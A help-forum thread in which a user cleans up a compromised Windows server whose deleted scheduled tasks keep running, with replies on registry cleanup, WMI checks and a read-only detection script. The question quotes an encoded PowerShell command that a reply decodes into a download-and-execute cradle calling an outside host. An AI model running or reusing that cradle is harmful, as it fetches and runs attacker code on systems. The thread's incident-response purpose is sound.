Deleted schedule tasks are still being performed

  • Question

  • My server was hacked by others.

    There are some scheduled tasks that run a PowerShell command. I deleted all of them, but those tasks are still running. What should I do?

    Here is the PowerShell command:

    HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAHkANgBoAC4AbgBlAHQALwBnAD8AaAAxADkAMAAzADIAMQAnACkA

    • Edited by Chivas_Tan Wednesday, April 3, 2019 5:10 AM
    Wednesday, April 3, 2019 5:04 AM

Answers

  • Yes, I resolved it myself.

    That PowerShell script downloads a script from a website. The script creates some scheduled tasks to run a PowerShell script. Although I deleted all the scheduled tasks, those tasks were still running. I set HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule\Start to 4 to disable the Task Scheduler service, restarted my server, cleaned HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache, and restored HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule\Start to 2 to run the Task Scheduler service again.

    The deleted tasks stopped running again.


    • Marked as answer by Chivas_Tan Wednesday, April 10, 2019 2:43 PM
    Wednesday, April 10, 2019 2:43 PM
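As an added example (not from the thread), a read-only PowerShell check a defender can run to surface the situation described above: it compares the entries in the TaskCache registry key with the tasks the scheduler API reports, flags cached tasks whose action launches PowerShell with an encoded command, and lists WMI event subscriptions as a later reply suggests. The registry paths are the ones named in the thread; the binary-to-text decoding of the Actions value and the command-line regex are assumptions.

```powershell
# Added example, not from the thread. Run from an elevated PowerShell prompt.
# Read-only: it reports findings, it does not delete anything.

$cacheRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache'

# 1. Every task the scheduler API currently knows about (what taskschd.msc shows).
$visible = Get-ScheduledTask | ForEach-Object { $_.TaskPath + $_.TaskName }

# 2. Every task that has a GUID entry in the registry cache. Each entry stores the
#    task's Path; the Actions value is a binary blob whose strings are UTF-16, so
#    decoding it as Unicode exposes the command line (assumption: good enough to grep).
$cached = Get-ChildItem "$cacheRoot\Tasks" | ForEach-Object {
    $p = Get-ItemProperty $_.PSPath
    $actions = if ($p.Actions) { [Text.Encoding]::Unicode.GetString($p.Actions) } else { '' }
    [pscustomobject]@{
        Id      = $_.PSChildName
        Path    = $p.Path
        Actions = ($actions -replace '[^\x20-\x7E]', ' ')
    }
}

# 3. Cache entries with no matching visible task are the ones to look at first.
$orphaned = $cached | Where-Object { $visible -notcontains $_.Path }
Write-Host 'Tasks present in TaskCache but not reported by the scheduler API:' -ForegroundColor Yellow
$orphaned | Format-Table Id, Path -AutoSize

# 4. Cached tasks whose action runs powershell.exe with -e / -enc / -EncodedCommand
#    (the pattern in the question). '-ep' does not match because 'p' is not whitespace.
Write-Host 'Cached tasks whose action runs an encoded PowerShell command:' -ForegroundColor Yellow
$cached | Where-Object { $_.Actions -match 'powershell' -and $_.Actions -match '-e(nc\w*)?\s' } |
    Format-Table Id, Path -AutoSize

# 5. Permanent WMI event subscriptions are another place a re-creating script can sit.
Write-Host 'WMI event subscription bindings:' -ForegroundColor Yellow
Get-CimInstance -Namespace root\subscription -ClassName __FilterToConsumerBinding |
    Format-Table Filter, Consumer -AutoSize
```

Anything reported in step 3 or 4 is worth exporting for the record before the TaskCache key is cleaned as the answer describes, so the rebuild decision in the later replies can be made with the evidence in hand.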

All replies

  • Hello, can you try stopping and disabling the “Task Scheduler” service, if you think they are still running? Sorry, I am not able to understand the language in the above screenprint.

    If you find this post helpful, please give a “Helpful” vote. Please remember to mark the replies as answers if they help.


    Wednesday, April 3, 2019 1:29 PM
  • Thank you. That screenprint is taskschd. There is a scheduled task named 00-15-4d-00-99-75. I had deleted it,

    but that task is still running.


    Thursday, April 4, 2019 7:12 AM
  • Hi Chivas, did you try disabling the service?

    If you find this post helpful, please give a “Helpful” vote. Please remember to mark the replies as answers if they help.

    Thursday, April 4, 2019 9:31 AM
  • Hi,

    Thanks for your question.

    I don't think it is a PowerShell command. 

    -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAHkANgBoAC4AbgBlAHQALwBnAD8AaAAxADkAMAAzADIAMQAnACkA

    What is the role of this long string of alphanumeric characters?

    Best regards,

    Lee


    Just do it.

    Friday, April 5, 2019 8:38 AM
  • If it has been compromised, just back up your data and start from scratch.

    Every second counts..make use of it. Disclaimer: This posting is provided AS IS with no warranties or guarantees and confers no rights.

    Friday, April 5, 2019 9:59 AM

  • I don't think it is a PowerShell command.

    It's base64 encoded. It translates to this:

    IEX (New-Object Net.WebClient).downloadstring('http://v.y6h.net/g?h190321')

    Friday, April 5, 2019 12:41 PM
  • Here is a similar thread. https://social.technet.microsoft.com/Forums/en-US/f2def74e-28f5-4532-8491-25c19b707575/need-help-figuring-out-why-eventlog-keeps-clearing?forum=ws2016

    Run this PowerShell command to see if the malware is hidden inside of WMI:

    Get-WMIObject -List | Where { $_.Name -match "powershell" }

    Malwarebytes worked for the other user, but as others have noted here, rebuilding your system is the safest way to get rid of the virus.

    Friday, April 5, 2019 1:16 PM
  • Hi,

    Was your issue resolved?

    If you resolved it using our solution, please "mark it as answer" to help other community members find the helpful reply quickly.

    If you resolved it using your own solution, please share your experience and solution here. It will be very beneficial for other community members who have similar questions.

    If no, please reply and tell us the current situation in order to provide further help.

    Best Regards,

    Lee


    Just do it.

    Monday, April 8, 2019 8:49 AM